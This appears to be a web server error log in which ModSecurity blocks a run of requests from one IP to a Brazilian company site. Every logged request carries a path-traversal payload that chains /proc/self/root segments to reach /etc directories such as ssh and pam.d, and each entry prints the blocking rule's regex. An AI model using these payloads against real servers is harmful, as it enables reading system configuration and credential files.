[Fri Mar 20 07:54:10.660668 2026] [:error] [pid 10189:tid 140411548894976] [client 74.7.243.128:53990] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nUjJ3M9BSuKP7CAYaawAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:54:15.166939 2026] [:error] [pid 7235:tid 140411624429312] [client 74.7.243.128:54002] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nV_qxLDW4GITHUkTmOgAAAQ4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:54:36.591690 2026] [:error] [pid 7893:tid 140411708356352] [client 74.7.243.128:54004] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nbBCii7xarUs8iHZnUQAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:54:39.085637 2026] [:error] [pid 7235:tid 140411599251200] [client 74.7.243.128:60534] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nb_qxLDW4GITHUkTmWwAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:54:41.362467 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.243.128:35056] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ncda6ubjKNq_cu4bT4QAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:54:42.614840 2026] [:error] [pid 21219:tid 140411607643904] [client 74.7.243.128:35062] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ncvXLqtnMIWvjpaKagAAAApA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:54:43.947215 2026] [:error] [pid 9818:tid 140411674785536] [client 74.7.243.128:35066] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nc11pVZ5mVmJwsFMwKAAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:54:45.326901 2026] [:error] [pid 9818:tid 140411733534464] [client 74.7.243.128:35082] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ndV1pVZ5mVmJwsFMwLgAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:54:47.069974 2026] [:error] [pid 21219:tid 140411716749056] [client 74.7.243.128:35086] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ndvXLqtnMIWvjpaKagQAAAoM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:54:49.587090 2026] [:error] [pid 11167:tid 140411565680384] [client 74.7.243.128:35092] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nePHIg5MgXLBnicP3KgAAAdU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:54:52.021398 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.243.128:42070] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nfOoXxyEfFpUF8f-ApgAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:54:53.332818 2026] [:error] [pid 11642:tid 140411540502272] [client 74.7.243.128:42080] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nfbninkcc-iUj5ApeUwAAA5g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:54:54.646481 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.243.128:42088] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nfta6ubjKNq_cu4bT6QAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:54:57.071056 2026] [:error] [pid 11167:tid 140411733534464] [client 74.7.243.128:42102] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ngfHIg5MgXLBnicP3LwAAAcE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:54:58.347996 2026] [:error] [pid 21219:tid 140411641214720] [client 74.7.243.128:42110] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ngvXLqtnMIWvjpaKahgAAAow"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:54:59.663618 2026] [:error] [pid 10189:tid 140411649607424] [client 74.7.243.128:55604] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ngzJ3M9BSuKP7CAYawQAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:55:00.958081 2026] [:error] [pid 7235:tid 140411641214720] [client 74.7.243.128:55608] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nhPqxLDW4GITHUkTmZAAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:55:06.926990 2026] [:error] [pid 11642:tid 140411599251200] [client 74.7.243.128:55622] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nibninkcc-iUj5ApeWQAAA5E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:55:09.605201 2026] [:error] [pid 11167:tid 140411582465792] [client 74.7.243.128:55632] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0njfHIg5MgXLBnicP3NgAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:55:10.954821 2026] [:error] [pid 11642:tid 140411683178240] [client 74.7.243.128:33886] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0njrninkcc-iUj5ApeXAAAA4c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:55:12.266657 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:33896] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nkNa6ubjKNq_cu4bT9QAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
